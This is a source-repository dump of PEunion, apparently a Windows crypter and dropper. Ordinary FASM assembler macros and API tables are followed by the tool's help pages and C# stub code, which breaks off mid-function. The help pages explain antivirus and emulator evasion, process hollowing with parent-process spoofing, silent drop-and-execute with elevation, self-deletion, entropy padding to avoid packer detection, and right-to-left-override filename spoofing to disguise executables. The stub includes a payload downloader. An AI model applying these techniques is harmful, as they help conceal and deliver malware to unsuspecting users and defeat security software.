2 | ; Macroinstructions for interfacing the COM (Component Object Model) classes
3 |
4 | macro cominvk object,proc,[arg]
5 | { common
6 | assert defined object#.com.object ; must be a COM object
7 | macro call dummy
8 | \{ mov rax,[rcx]
9 | call [rax+object#.#proc] \}
10 | fastcall ,[object],arg
11 | purge call }
12 |
13 | macro comcall handle,interface,proc,[arg]
14 | { common
15 | assert defined interface#.com.interface ; must be a COM interface
16 | macro call dummy
17 | \{ mov rax,[rcx]
18 | call [rax+interface#.#proc] \}
19 | fastcall ,handle,arg
20 | purge call }
21 |
22 | macro interface name,[proc]
23 | { common
24 | struc name \{
25 | match , @struct \\{ define field@struct .,name, \\}
26 | match no, @struct \\{ . dq ?
27 | virtual at 0
28 | forward
29 | .#proc dq ?
30 | common
31 | .\#\\.com.object = name#.com.interface
32 | end virtual \\} \}
33 | virtual at 0
34 | forward
35 | name#.#proc dq ?
36 | common
37 | name#.com.interface = $ shr 3
38 | end virtual }
39 |
40 |
--------------------------------------------------------------------------------
/contrib/PEunion/FASM/INCLUDE/MACRO/EXPORT.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Macroinstruction for making export section
3 |
4 | macro export dllname,[label,string]
5 | { common
6 | local module,addresses,names,ordinal,count
7 | count = 0
8 | forward
9 | count = count+1
10 | common
11 | dd 0,0,0,RVA module,1
12 | dd count,count,RVA addresses,RVA names,RVA ordinal
13 | addresses:
14 | forward
15 | dd RVA label
16 | common
17 | names:
18 | forward
19 | local name
20 | dd RVA name
21 | common
22 | ordinal: count = 0
23 | forward
24 | dw count
25 | count = count+1
26 | common
27 | module db dllname,0
28 | forward
29 | name db string,0
30 | common
31 | local x,y,z,str1,str2,v1,v2
32 | x = count shr 1
33 | while x > 0
34 | y = x
35 | while y < count
36 | z = y
37 | while z-x >= 0
38 | load v1 dword from names+z*4
39 | str1=($-RVA $)+v1
40 | load v2 dword from names+(z-x)*4
41 | str2=($-RVA $)+v2
42 | while v1 > 0
43 | load v1 from str1+%-1
44 | load v2 from str2+%-1
45 | if v1 <> v2
46 | break
47 | end if
48 | end while
49 | if v1 name#.lookup
41 | name#.redundant = 0
42 | dd 0
43 | else
44 | name#.redundant = 1
45 | end if
46 | name#.address:
47 | forward
48 | if used label
49 | if string eqtype ''
50 | label dd RVA _label
51 | else
52 | label dd 80000000h + string
53 | end if
54 | end if
55 | common
56 | if ~ name#.redundant
57 | dd 0
58 | end if
59 | forward
60 | if used label & string eqtype ''
61 | _label dw 0
62 | db string,0
63 | rb RVA $ and 1
64 | end if
65 | common
66 | end if }
67 |
68 | macro api [name] {}
69 |
--------------------------------------------------------------------------------
/contrib/PEunion/FASM/INCLUDE/MACRO/IMPORT64.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Macroinstructions for making import section (64-bit)
3 |
4 | macro library [name,string]
5 | { common
6 | import.data:
7 | forward
8 | local _label
9 | if defined name#.redundant
10 | if ~ name#.redundant
11 | dd RVA name#.lookup,0,0,RVA _label,RVA name#.address
12 | end if
13 | end if
14 | name#.referred = 1
15 | common
16 | dd 0,0,0,0,0
17 | forward
18 | if defined name#.redundant
19 | if ~ name#.redundant
20 | _label db string,0
21 | rb RVA $ and 1
22 | end if
23 | end if }
24 |
25 | macro import name,[label,string]
26 | { common
27 | rb (- rva $) and 7
28 | if defined name#.referred
29 | name#.lookup:
30 | forward
31 | if used label
32 | if string eqtype ''
33 | local _label
34 | dq RVA _label
35 | else
36 | dq 8000000000000000h + string
37 | end if
38 | end if
39 | common
40 | if $ > name#.lookup
41 | name#.redundant = 0
42 | dq 0
43 | else
44 | name#.redundant = 1
45 | end if
46 | name#.address:
47 | forward
48 | if used label
49 | if string eqtype ''
50 | label dq RVA _label
51 | else
52 | label dq 8000000000000000h + string
53 | end if
54 | end if
55 | common
56 | if ~ name#.redundant
57 | dq 0
58 | end if
59 | forward
60 | if used label & string eqtype ''
61 | _label dw 0
62 | db string,0
63 | rb RVA $ and 1
64 | end if
65 | common
66 | end if }
67 |
68 | macro api [name] {}
69 |
--------------------------------------------------------------------------------
/contrib/PEunion/FASM/INCLUDE/MACRO/MASM.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Simulate MASM's syntax
3 |
4 | struc struct
5 | { struct .
6 | name@struct equ . }
7 |
8 | struc ends
9 | { match =.,name@struct \{ ends \} }
10 |
11 | struc proc [params]
12 | { common define@proc .,
13 | name@proc equ . }
14 |
15 | struc endp
16 | { match =.,name@proc \{ endp \} }
17 |
18 | macro option setting
19 | { match =prologue:macro, setting \{ prologue@proc equ macro \}
20 | match =epilogue:macro, setting \{ epilogue@proc equ macro \} }
21 |
22 | macro none procname,flag,parmbytes,localbytes,reglist { }
23 |
24 | macro assume params
25 | {
26 | local expr
27 | define expr params
28 | match reg:struct, expr
29 | \{
30 | match assumed, reg\#@assumed \\{ irp name, assumed \\\{ restore name \\\} \\}
31 | macro label . \\{ local def
32 | define def .
33 | match =reg =at label, def \\\{ define def \\\}
34 | match name at,def \\\{ def@assumed reg,name,label at
35 | define def \\\}
36 | match name,def \\\{ def@assumed reg,.,: \\\} \\}
37 | struc db [val] \\{ \common def@assumed reg,., \\}
38 | struc dw [val] \\{ \common def@assumed reg,., \\}
39 | struc dp [val] \\{ \common def@assumed reg,., \\}
40 | struc dd [val] \\{ \common def@assumed reg,., \\}
41 | struc dt [val] \\{ \common def@assumed reg,., \\}
42 | struc dq [val] \\{ \common def@assumed reg,., \\}
43 | struc rb cnt \\{ def@assumed reg,.,rb cnt \\}
44 | struc rw cnt \\{ def@assumed reg,.,rw cnt \\}
45 | struc rp cnt \\{ def@assumed reg,.,rp cnt \\}
46 | struc rd cnt \\{ def@assumed reg,.,rd cnt \\}
47 | struc rt cnt \\{ def@assumed reg,.,rt cnt \\}
48 | struc rq cnt \\{ def@assumed reg,.,rq cnt \\}
49 | reg\#@assumed equ
50 | virtual at reg
51 | reg struct
52 | end virtual
53 | purge label
54 | restruc db,dw,dp,dd,dt,dq
55 | restruc rb,rw,rp,rd,rt,rq \} }
56 |
57 | macro def@assumed reg,name,def
58 | { match vars, reg#@assumed \{ reg#@assumed equ reg#@assumed, \}
59 | reg#@assumed equ reg#@assumed name
60 | local ..label
61 | name equ ..label
62 | ..label def }
63 |
64 | struc label type { label . type }
65 |
66 | struc none { label . }
67 |
--------------------------------------------------------------------------------
/contrib/PEunion/FASM/INCLUDE/PCOUNT/COMCTL32.INC:
--------------------------------------------------------------------------------
1 |
2 | ; COMCTL32 API calls parameters' count
3 |
4 | CreateMappedBitmap% = 5
5 | CreatePropertySheetPage% = 1
6 | CreateStatusWindow% = 4
7 | CreateToolbar% = 8
8 | CreateToolbarEx% = 13
9 | CreateUpDownControl% = 12
10 | DestroyPropertySheetPage% = 1
11 | DrawInsert% = 3
12 | DrawStatusText% = 4
13 | FlatSB_EnableScrollBar% = 3
14 | FlatSB_GetScrollInfo% = 3
15 | FlatSB_GetScrollPos% = 2
16 | FlatSB_GetScrollProp% = 3
17 | FlatSB_GetScrollRange% = 4
18 | FlatSB_SetScrollInfo% = 4
19 | FlatSB_SetScrollPos% = 4
20 | FlatSB_SetScrollProp% = 4
21 | FlatSB_SetScrollRange% = 5
22 | FlatSB_ShowScrollBar% = 3
23 | GetEffectiveClientRect% = 3
24 | ImageList_Add% = 3
25 | ImageList_AddIcon% = 2
26 | ImageList_AddMasked% = 3
27 | ImageList_BeginDrag% = 4
28 | ImageList_Copy% = 5
29 | ImageList_Create% = 5
30 | ImageList_Destroy% = 1
31 | ImageList_DragEnter% = 3
32 | ImageList_DragLeave% = 1
33 | ImageList_DragMove% = 2
34 | ImageList_DragShowNolock% = 1
35 | ImageList_Draw% = 6
36 | ImageList_DrawEx% = 10
37 | ImageList_DrawIndirect% = 1
38 | ImageList_Duplicate% = 1
39 | ImageList_EndDrag% = 0
40 | ImageList_GetBkColor% = 1
41 | ImageList_GetDragImage% = 2
42 | ImageList_GetIcon% = 3
43 | ImageList_GetIconSize% = 3
44 | ImageList_GetImageCount% = 1
45 | ImageList_GetImageInfo% = 3
46 | ImageList_GetImageRect% = 3
47 | ImageList_LoadImage% = 7
48 | ImageList_Merge% = 6
49 | ImageList_Read% = 1
50 | ImageList_Remove% = 2
51 | ImageList_Replace% = 4
52 | ImageList_ReplaceIcon% = 3
53 | ImageList_SetBkColor% = 2
54 | ImageList_SetDragCursorImage% = 4
55 | ImageList_SetFilter% = 3
56 | ImageList_SetIconSize% = 3
57 | ImageList_SetImageCount% = 2
58 | ImageList_SetOverlayImage% = 3
59 | ImageList_Write% = 2
60 | InitCommonControls% = 0
61 | InitCommonControlsEx% = 1
62 | InitializeFlatSB% = 1
63 | LBItemFromPt% = 4
64 | MakeDragList% = 1
65 | MenuHelp% = 7
66 | PropertySheet% = 1
67 | ShowHideMenuCtl% = 3
68 | UninitializeFlatSB% = 1
69 | _TrackMouseEvent% = 1
70 |
--------------------------------------------------------------------------------
/contrib/PEunion/FASM/INCLUDE/PCOUNT/COMDLG32.INC:
--------------------------------------------------------------------------------
1 |
2 | ; COMDLG32 API calls parameters' count
3 |
4 | ChooseColor% = 1
5 | ChooseFont% = 1
6 | CommDlgExtendedError% = 0
7 | FindText% = 1
8 | FormatCharDlgProc% = 4
9 | GetFileTitle% = 3
10 | GetOpenFileName% = 1
11 | GetSaveFileName% = 1
12 | LoadAlterBitmap% = 3
13 | PageSetupDlg% = 1
14 | PrintDlg% = 1
15 | ReplaceText% = 1
16 | WantArrows% = 4
17 | dwLBSubclass% = 4
18 | dwOKSubclass% = 4
19 |
--------------------------------------------------------------------------------
/contrib/PEunion/FASM/INCLUDE/PCOUNT/SHELL32.INC:
--------------------------------------------------------------------------------
1 |
2 | ; SHELL32 API calls parameters' count
3 |
4 | CheckEscapes% = 2
5 | DoEnvironmentSubst% = 2
6 | DragAcceptFiles% = 2
7 | DragFinish% = 1
8 | DragQueryFile% = 4
9 | DragQueryPoint% = 2
10 | DuplicateIcon% = 2
11 | ExtractAssociatedIcon% = 3
12 | ExtractAssociatedIconEx% = 4
13 | ExtractIcon% = 3
14 | ExtractIconEx% = 5
15 | ExtractIconResInfo% = 5
16 | FindExeDlgProc% = 4
17 | FindExecutable% = 3
18 | FreeIconList% = 2
19 | InternalExtractIconList% = 3
20 | RealShellExecute% = 10
21 | RealShellExecuteEx% = 11
22 | RegenerateUserEnvironment% = 2
23 | SHAddToRecentDocs% = 2
24 | SHAppBarMessage% = 2
25 | SHBrowseForFolder% = 1
26 | SHChangeNotify% = 4
27 | SHEmptyRecycleBin% = 3
28 | SHFileOperation% = 1
29 | SHFormatDrive% = 4
30 | SHFreeNameMappings% = 1
31 | SHGetDataFromIDList% = 5
32 | SHGetDesktopFolder% = 1
33 | SHGetDiskFreeSpace% = 4
34 | SHGetFileInfo% = 5
35 | SHGetInstanceExplorer% = 1
36 | SHGetMalloc% = 1
37 | SHGetNewLinkInfo% = 5
38 | SHGetPathFromIDList% = 2
39 | SHGetSettings% = 2
40 | SHGetSpecialFolderLocation% = 3
41 | SHGetSpecialFolderPath% = 4
42 | SHInvokePrinterCommand% = 5
43 | SHLoadInProc% = 1
44 | SHQueryRecycleBin% = 2
45 | SHUpdateRecycleBinIcon% = 0
46 | SheChangeDir% = 1
47 | SheChangeDirEx% = 1
48 | SheFullPath% = 3
49 | SheGetCurDrive% = 0
50 | SheGetDir% = 2
51 | SheRemoveQuotes% = 1
52 | SheSetCurDrive% = 1
53 | SheShortenPath% = 2
54 | ShellAbout% = 4
55 | ShellExecute% = 6
56 | ShellExecuteEx% = 1
57 | ShellHookProc% = 3
58 | Shell_NotifyIcon% = 2
59 | StrChr% = 2
60 | StrChrI% = 2
61 | StrCmpN% = 3
62 | StrCmpNI% = 3
63 | StrCpyN% = 3
64 | StrNCmp% = 3
65 | StrNCmpI% = 3
66 | StrNCpy% = 3
67 | StrRChr% = 3
68 | StrRChrI% = 3
69 | StrRStr% = 3
70 | StrRStrI% = 3
71 | StrStr% = 2
72 | StrStrI% = 2
73 | WOWShellExecute% = 7
74 |
--------------------------------------------------------------------------------
/contrib/PEunion/FASM/INCLUDE/PCOUNT/WSOCK32.INC:
--------------------------------------------------------------------------------
1 |
2 | ; WSOCK32 API calls parameters' count
3 |
4 | AcceptEx% = 8
5 | EnumProtocols% = 3
6 | GetAcceptExSockaddrs% = 8
7 | GetAddressByName% = 10
8 | GetNameByType% = 3
9 | GetService% = 7
10 | GetTypeByName% = 2
11 | MigrateWinsockConfiguration% = 3
12 | NPLoadNameSpaces% = 3
13 | SetService% = 6
14 | TransmitFile% = 7
15 | WEP% = 0
16 | WSAAsyncGetHostByAddr% = 7
17 | WSAAsyncGetHostByName% = 5
18 | WSAAsyncGetProtoByName% = 5
19 | WSAAsyncGetProtoByNumber% = 5
20 | WSAAsyncGetServByName% = 6
21 | WSAAsyncGetServByPort% = 6
22 | WSACancelAsyncRequest% = 4
23 | WSACancelBlockingCall% = 0
24 | WSACleanup% = 0
25 | WSAGetLastError% = 0
26 | WSAIsBlocking% = 0
27 | WSARecvEx% = 4
28 | WSASetBlockingHook% = 1
29 | WSASetLastError% = 1
30 | WSAStartup% = 2
31 | WSAUnhookBlockingHook% = 0
32 | __WSAFDIsSet% = 2
33 | accept% = 3
34 | bind% = 3
35 | closesocket% = 1
36 | connect% = 3
37 | dn_expand% = 5
38 | gethostbyaddr% = 3
39 | gethostbyname% = 1
40 | gethostname% = 2
41 | getnetbyname% = 1
42 | getpeername% = 3
43 | getprotobyname% = 1
44 | getprotobynumber% = 1
45 | getservbyname% = 2
46 | getservbyport% = 2
47 | getsockname% = 3
48 | getsockopt% = 5
49 | htonl% = 1
50 | htons% = 1
51 | inet_addr% = 1
52 | inet_network% = 1
53 | inet_ntoa% = 1
54 | ioctlsocket% = 3
55 | listen% = 2
56 | ntohl% = 1
57 | ntohs% = 1
58 | rcmd% = 6
59 | recv% = 4
60 | recvfrom% = 6
61 | rexec% = 6
62 | rresvport% = 1
63 | s_perror% = 2
64 | select% = 5
65 | send% = 4
66 | sendto% = 6
67 | sethostname% = 2
68 | setsockopt% = 5
69 | shutdown% = 2
70 | socket% = 3
71 |
--------------------------------------------------------------------------------
/contrib/PEunion/FASM/INCLUDE/WIN32A.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Win32 programming headers (ASCII)
3 |
4 | include 'macro/struct.inc'
5 | include 'macro/proc32.inc'
6 | include 'macro/com32.inc'
7 | include 'macro/import32.inc'
8 | include 'macro/export.inc'
9 | include 'macro/resource.inc'
10 |
11 | struc TCHAR [val] { common match any, val \{ . db val \}
12 | match , val \{ . db ? \} }
13 | sizeof.TCHAR = 1
14 |
15 | include 'equates/kernel32.inc'
16 | include 'equates/user32.inc'
17 | include 'equates/gdi32.inc'
18 | include 'equates/comctl32.inc'
19 | include 'equates/comdlg32.inc'
20 | include 'equates/shell32.inc'
21 | include 'equates/wsock32.inc'
22 |
23 | macro api [name] { if used name
24 | label name dword at name#A
25 | end if }
26 |
--------------------------------------------------------------------------------
/contrib/PEunion/FASM/INCLUDE/WIN32W.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Win32 programming headers (WideChar)
3 |
4 | include 'macro/struct.inc'
5 | include 'macro/proc32.inc'
6 | include 'macro/com32.inc'
7 | include 'macro/import32.inc'
8 | include 'macro/export.inc'
9 | include 'macro/resource.inc'
10 |
11 | struc TCHAR [val] { common match any, val \{ . du val \}
12 | match , val \{ . du ? \} }
13 | sizeof.TCHAR = 2
14 |
15 | include 'equates/kernel32.inc'
16 | include 'equates/user32.inc'
17 | include 'equates/gdi32.inc'
18 | include 'equates/comctl32.inc'
19 | include 'equates/comdlg32.inc'
20 | include 'equates/shell32.inc'
21 | include 'equates/wsock32.inc'
22 |
23 | macro api [name] { if used name
24 | label name dword at name#W
25 | end if }
26 |
--------------------------------------------------------------------------------
/contrib/PEunion/FASM/INCLUDE/WIN64A.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Win64 programming headers (ASCII)
3 |
4 | include 'macro/struct.inc'
5 | include 'macro/proc64.inc'
6 | include 'macro/com64.inc'
7 | include 'macro/import64.inc'
8 | include 'macro/export.inc'
9 | include 'macro/resource.inc'
10 |
11 | struc TCHAR [val] { common match any, val \{ . db val \}
12 | match , val \{ . db ? \} }
13 | sizeof.TCHAR = 1
14 |
15 | include 'equates/kernel64.inc'
16 | include 'equates/user64.inc'
17 | include 'equates/gdi64.inc'
18 | include 'equates/comctl64.inc'
19 | include 'equates/comdlg64.inc'
20 | include 'equates/shell64.inc'
21 |
22 | macro api [name] { if used name
23 | label name qword at name#A
24 | end if }
25 |
26 |
--------------------------------------------------------------------------------
/contrib/PEunion/FASM/INCLUDE/WIN64W.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Win64 programming headers (WideChar)
3 |
4 | include 'macro/struct.inc'
5 | include 'macro/proc64.inc'
6 | include 'macro/com64.inc'
7 | include 'macro/import64.inc'
8 | include 'macro/export.inc'
9 | include 'macro/resource.inc'
10 |
11 | struc TCHAR [val] { common match any, val \{ . du val \}
12 | match , val \{ . du ? \} }
13 | sizeof.TCHAR = 2
14 |
15 | include 'equates/kernel64.inc'
16 | include 'equates/user64.inc'
17 | include 'equates/gdi64.inc'
18 | include 'equates/comctl64.inc'
19 | include 'equates/comdlg64.inc'
20 | include 'equates/shell64.inc'
21 |
22 | macro api [name] { if used name
23 | label name qword at name#W
24 | end if }
--------------------------------------------------------------------------------
/contrib/PEunion/Help/App/Changelog.md:
--------------------------------------------------------------------------------
1 | # Changelog
2 |
3 | ## 4.0.0 (08.09.2021)
4 |
5 | **Initial release:** Complete re-design of version 3.x
6 |
7 | * Two stubs (native & .NET)
8 | * AV evasion & emulator detection
9 | * Low entropy packing scheme
10 | * Improved obfuscation engine
11 | * Commandline compiler for project files
12 | * UI & usability overhaul
--------------------------------------------------------------------------------
/contrib/PEunion/Help/Default.md:
--------------------------------------------------------------------------------
1 | # Help
2 |
3 | Click on the
4 | 
5 | icons on any page to get more information.
--------------------------------------------------------------------------------
/contrib/PEunion/Help/Project/Items/Drop.md:
--------------------------------------------------------------------------------
1 | # Drop file
2 |
3 | A file is written to disk.
4 |
5 | * `Drop Location`: The base directory to write the file in
6 | * `Drop Filename`: The filename of the written file
7 | * `Set File Attributes`: File attributes of the written file
8 |
9 | Optionally, this file can be executed:
10 |
11 | * `Do not execute`: Just write the file to disk
12 | * `Execute`: Execute using `ShellExecute` using the `open` verb
13 | * `Execute elevated`: Execute using `ShellExecute` using the `runas` verb
14 |
15 | If using the `runas` verb and the user does not consent, the file will not be run, but the stub continues execution.
16 |
17 | ## Example
18 |
19 | The stub has two items:
20 |
21 | 1. `RunPE` a small executable
22 | 2. `Drop` a large file to the temp directory and execute
--------------------------------------------------------------------------------
/contrib/PEunion/Help/Project/Items/Invoke.md:
--------------------------------------------------------------------------------
1 | # Invoke (.NET)
2 |
3 | A .NET executable is executed in-memory. This is achieved using built-in language capability:
4 |
5 | ```
6 | byte[] dotNetExecutable = ....;
7 | Assembly.Load(dotNetExecutable).EntryPoint.Invoke()
8 | ```
9 |
10 | This feature is only available in a .NET stub. It is recommended to use `Invoke` for .NET executables instead of `RunPE`.
--------------------------------------------------------------------------------
/contrib/PEunion/Help/Project/Items/MessageBox.md:
--------------------------------------------------------------------------------
1 | # Message Box
2 |
3 | Displays a Message Box with the specified content. Click `Preview` to see the MessageBox.
4 |
5 | ## Events
6 |
7 | A button click does nothing by default. However, it can be used to trigger specific actions:
8 |
9 | * `Skip next action`: The next item of the project is not executed if the button was clicked
10 | * `Exit`: The stub terminates if the button was clicked
11 |
12 | **Example:**
13 |
14 | ```
15 | Do you want to write "file.exe" to disk?
16 | [Yes] [No]
17 | ```
18 |
19 | In this example, the next item is a `Drop` and the event of the No-button is set to `Skip next action`. The Yes-button is set to `Do nothing`.
--------------------------------------------------------------------------------
/contrib/PEunion/Help/Project/Items/RunPE.md:
--------------------------------------------------------------------------------
1 | # RunPE (process hollowing)
2 |
3 | A native executable is executed in-memory. For .NET executables, use `Invoke` in a .NET stub
4 |
5 | A new process is created in a suspended state. The process memory is replaced with the specified file and the process is resumed. The new process is forked from the originally executed file (the stub). Additionally, the parent process ID is spoofed. Most importantly, the file is not written to disk.
6 |
7 | If the file contains EOF data, check `Use EOF Data` to include EOF data in the stub.
--------------------------------------------------------------------------------
/contrib/PEunion/Help/Project/Items/Source.md:
--------------------------------------------------------------------------------
1 | # Item Source
2 |
3 | `Source` is the file to be used.
4 |
5 | ## Embedded file
6 |
7 | The file is embedded in the compiled binary.
8 |
9 | ### File properties
10 |
11 | * `Compress`: The file is stored compressed. This is not recommended for large files, as decompression might exceed memory limits. Compression does not increase executable entropy as all embedded files are encrypted in addition. Use `stub padding` to decrease entropy.
12 | * `Use EOF Data`: If the executable contains data after the end of the file, these bytes are appended to the compiled binary in unencrypted form.
13 |
14 | ## Download
15 |
16 | The file is downloaded from the specified URL.
--------------------------------------------------------------------------------
/contrib/PEunion/Help/Project/Manifest.md:
--------------------------------------------------------------------------------
1 | # Manifest
2 |
3 | A manifest can be included in the output binary. Two templates exist:
4 |
5 | * `Default`: A standard manifest with a `requestedExecutionLevel` of `asInvoker`
6 | * `Elevated`: A UAC manifest with a `requestedExecutionLevel` of `requireAdministrator`
7 |
8 | In addition to the standard templates, a custom manifest file can be specified. It is advisable to always include a manifest.
9 |
10 | If the output binary requires elevated privileges, a UAC manifest should be included.
11 |
12 | ## Example of mixed elevated / not elevated usage
13 |
14 | * One executable is run in-memory (RunPE) and does not require elevated privileges
15 | * Another executable which requires elevated privileges is dropped and executed
16 |
17 | If a UAC manifest is included and the user cancels elevation, both executables are **not** run. By not including a UAC manifest, the in-memory execution still takes place. The dropped file will then trigger the UAC dialog.
--------------------------------------------------------------------------------
/contrib/PEunion/Help/Project/StartupMelt.md:
--------------------------------------------------------------------------------
1 | # Melt
2 |
3 | The executable deletes itself.
4 |
5 | A `powershell.exe` process is started that attempts to delete the file every 100ms for a duration of up to 1 minute.
--------------------------------------------------------------------------------
/contrib/PEunion/Help/Project/StubIcon.md:
--------------------------------------------------------------------------------
1 | # Stub Icon
2 |
3 | The compiled binary has no icon by default. To define an icon, select an `.ico` file.
4 |
5 | If you select an `.exe` file as the icon source, the icon of that executable is extracted and used.
6 |
7 | Click `From Item` to extract an icon from one of the executable files of your project.
--------------------------------------------------------------------------------
/contrib/PEunion/Help/Project/StubPadding.md:
--------------------------------------------------------------------------------
1 | # Stub Padding
2 |
3 | At runtime, the stub decrypts the main shellcode that contains the the "actual" stub and all embedded files.
4 |
5 | However, encryption results in high-entropy, which causes AV alerts. Therefore, a low-entropy packing scheme is used. The padding consists of `0x00` bytes that are intermingled with the encrypted shellcode.
6 |
7 | `Padding` example values:
8 |
9 | * `50`: The compiled file will be about 50% larger **(recommended)**
10 | * `100`: The compiled file will be about twice as large
11 | * `500`: The compiled file will be about 6 times as large
12 |
13 | Padding can also be used to simulate a larger file, if required.
14 |
15 | **Note:** The size differences may vary by several KB.
16 |
17 | **Important:** It is generally advisable to set the padding to about `50` to not cause packer detection due to high entropy. **Compressing** files and applying a padding of **50** afterwards is recommendable.
--------------------------------------------------------------------------------
/contrib/PEunion/Help/Project/StubType.md:
--------------------------------------------------------------------------------
1 | # Stub
2 |
3 | * The native stub is written in assembly and compiled with the FASM compiler
4 | * The .NET stub is written in C# and compiled using CodeDom, targeting either x86 or x64
5 |
6 | **Note:** If you want to execute a .NET executable in-memory, use `Invoke` instead of `RunPE`. For this, the .NET stub is required.
--------------------------------------------------------------------------------
/contrib/PEunion/Help/Rtlo/Icon.md:
--------------------------------------------------------------------------------
1 | # Icon
2 |
3 | You can optionally change the icon of the saved file. This only work for executables. The saved file's resources are updated to include the selected icon.
--------------------------------------------------------------------------------
/contrib/PEunion/Help/Rtlo/NewFilename.md:
--------------------------------------------------------------------------------
1 | # New Filename
2 |
3 | The new filename is made of 3 parts:
4 |
5 | 1. `Filename`: The first part of the new filename
6 | 2. `Extension`: The original extension of the file, in reverse character order
7 | 3. `Spoofed Extension`: An arbitrary spoofed extension
8 |
9 | Due to the right-to-left override character, the `Extension` part is displayed in the middle of the new filename and in reverse character order. However, the `Exact Character Representation` shows that it is still the actual extension of the new file.
10 |
11 | Therefore, it cannot be changed. However, some extensions are interchangeable, such as `.exe` and `.scr`. This is why `rcs` appears in the DropDown list when your original file is an `.exe` file.
12 |
13 | **Tip:** Try typing different strings into part 1, 2 and 3 and watch the changes in the `Preview` section.
--------------------------------------------------------------------------------
/contrib/PEunion/Help/Rtlo/OriginalFile.md:
--------------------------------------------------------------------------------
1 | # Original File
2 |
3 | This is the original file to be used. Follow these steps to create a new file with the right-to-left override character:
4 |
5 | 1. Select a file.
6 | 2. Under `New Filename`, change any of the 3 parts of the filename
7 | 3. Check the `Preview` section to see the new filename
8 | 4. If required, change the icon of the output file
9 |
10 | When you click `Save`, the originally selected file will be copied to the new location using the new filename containing the right-to-left override character.
--------------------------------------------------------------------------------
/contrib/PEunion/Help/Rtlo/Preview.md:
--------------------------------------------------------------------------------
1 | # Preview
2 |
3 | This is the preview of the new filename.
4 |
5 | ## Display name in File Explorer
6 |
7 | This is what your new file will look like in File Explorer.
8 |
9 | ## Exact character representation
10 |
11 | This is the actual string of the new filename. `(U+202E)` is the right-to-left override character. After this character, the string is displayed in reverse.
--------------------------------------------------------------------------------
/contrib/PEunion/Help/Template.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
49 |
50 |
51 | {BODY}
52 |
53 |
--------------------------------------------------------------------------------
/contrib/PEunion/LICENSE.md:
--------------------------------------------------------------------------------
1 | Copyright (c) 2021, bytecode77
2 | All rights reserved.
3 |
4 | Redistribution and use in source and binary forms, with or without
5 | modification, are permitted provided that the following conditions are met:
6 |
7 | * Redistributions of source code must retain the above copyright notice, this
8 | list of conditions and the following disclaimer.
9 |
10 | * Redistributions in binary form must reproduce the above copyright notice, this
11 | list of conditions and the following disclaimer in the documentation and/or
12 | other materials provided with the distribution.
13 |
14 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
15 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
16 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
17 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
18 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
19 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
20 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
21 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
22 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
23 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
--------------------------------------------------------------------------------
/contrib/PEunion/PEunion.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/PEunion/PEunion.exe
--------------------------------------------------------------------------------
/contrib/PEunion/PEunion.exe.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/contrib/PEunion/Stub/dotnet/Compression.cs:
--------------------------------------------------------------------------------
1 | using System.IO;
2 | using System.IO.Compression;
3 |
4 | public partial class __Stub
5 | {
6 | ///
7 | /// byte[] Decompress(byte[] data)
8 | ///
9 | public static byte[] __Decompress(byte[] __data)
10 | {
11 | // Decompress data using GZip
12 | using (MemoryStream memoryStream = new MemoryStream())
13 | {
14 | using (GZipStream gzipStream = new GZipStream(new MemoryStream(__data), CompressionMode.Decompress))
15 | {
16 | gzipStream.CopyTo(memoryStream);
17 | }
18 |
19 | return memoryStream.ToArray();
20 | }
21 | }
22 | }
--------------------------------------------------------------------------------
/contrib/PEunion/Stub/dotnet/Download.cs:
--------------------------------------------------------------------------------
1 | using System.Net;
2 |
3 | public partial class __Stub
4 | {
5 | ///
6 | /// byte[] Download(string url)
7 | ///
8 | public static byte[] __Download(string __url)
9 | {
10 | // Disable SSL / TLS checks
11 | foreach (int protocol in new[]
12 | {
13 | /**/48, // SSL3
14 | /**/192, // TLS
15 | /**/768, // TLS 1.1
16 | /**/3072, // TLS 1.2
17 | /**/12288, // TLS 1.3
18 | })
19 | {
20 | try
21 | {
22 | ServicePointManager.SecurityProtocol |= (SecurityProtocolType)protocol;
23 | }
24 | catch
25 | {
26 | }
27 | }
28 |
29 | // Download file
30 | using (WebClient webClient = new WebClient())
31 | {
32 | return webClient.DownloadData(__url);
33 | }
34 | }
35 | }
--------------------------------------------------------------------------------
/contrib/PEunion/Stub/dotnet/Emulator.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.IO;
3 | using System.Reflection;
4 |
5 | public partial class __Stub
6 | {
7 | ///
8 | /// void DetectEmulator()
9 | ///
10 | public static void __DetectEmulator()
11 | {
12 | // Get WinAPI functions
13 | __SetErrorModeDelegate setErrorMode = __GetFunction<__SetErrorModeDelegate>(/**/"kernel32.dll", /**/"SetErrorMode");
14 | __VirtualAllocExNumaDelegate virtualAllocExNuma = __GetFunction<__VirtualAllocExNumaDelegate>(/**/"kernel32.dll", /**/"VirtualAllocExNuma");
15 |
16 | // Allocating 100 MB of memory must work
17 | {
